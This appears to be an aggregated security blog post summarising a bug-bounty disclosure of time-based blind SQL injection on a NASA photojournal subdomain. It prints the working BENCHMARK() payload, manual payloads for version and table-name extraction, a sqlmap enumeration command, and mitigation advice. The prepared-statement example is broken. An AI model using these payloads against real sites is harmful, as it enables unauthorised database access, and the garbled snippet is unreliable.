Blind SQL Injection at photojournaljplnasagov – A Deep Dive

By /

Listen to this Post

A critical SQL Injection vulnerability was discovered at NASA’s `photojournal.jpl.nasa.gov` subdomain, manually exploited using the `BENCHMARK()` operator. The researcher confirmed the vulnerability by leveraging time-based techniques to extract database information.

Bugcrowd Disclosure:

https://bugcrowd.com/disclosures/e1e58b97-af59-49ae-acca-52bccab96e33/blind-sql-injection-at-photojournal-jpl-nasa-gov

You Should Know: Exploiting Blind SQL Injection with BENCHMARK()

1. Understanding the Payload

The researcher used a time-based payload to confirm the SQLi vulnerability: 

-1+OR+IF(MID(version(),1,5)='5.7.2',BENCHMARK(900000,SHA1(1)),1)--+-

BENCHMARK(count, expr): Repeatedly executes `expr` (e.g., SHA1(1)) `count` times.
IF(): Checks if the MySQL version starts with 5.7.2. If true, it triggers a delay.

2. Manual Exploitation Steps

1. Identify the vulnerable parameter (e.g., `?id=1`).

  1. Test for Blind SQLi using a delay-based payload: 
    ?id=1 AND IF(1=1,SLEEP(5),0)--

3. Extract database version:

?id=1 AND IF(MID(version(),1,1)='5',BENCHMARK(10000000,SHA1(1)),0)--

4. Dump table names:

?id=1 AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1,1),1,1)='a',BENCHMARK(5000000,SHA1(1)),0)--

3. Automating with SQLmap

For ethical testing, use:

sqlmap -u "http://example.com?id=1" --technique=T --dbms=mysql --batch --dbs

--technique=T: Time-based exploitation.
--dbs: Enumerate databases.

4. Mitigation (For Developers)

  • Use Prepared Statements: 
    $stmt = $pdo->prepare("SELECT  FROM users WHERE id = ?");
$stmt->execute([$id]);
  • Input Validation: Whitelist allowed characters.
  • WAF Rules: Deploy ModSecurity or Cloudflare to block SQLi patterns.

What Undercode Say

Blind SQLi remains a severe threat, especially in legacy systems. The `BENCHMARK()` technique is powerful for time-based exploitation but requires patience. Always:
– Test with legal authorization.
– Use `sqlmap` for efficiency but understand manual techniques.
– Patch systems with parameterized queries.

Linux/Win Commands for Security Testing:

 Check open ports (Linux) 
nmap -sV target.com

Monitor HTTP traffic (Linux) 
tcpdump -i eth0 port 80 -w output.pcap

Windows log analysis (PowerShell) 
Get-EventLog -LogName Security -InstanceId 4625 -Newest 10

Expected Output:

A detailed report on Blind SQL Injection exploitation, mitigation, and related security commands.

Reference:

References:

Reported By: Miguelsegoviagil Bugbounty – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: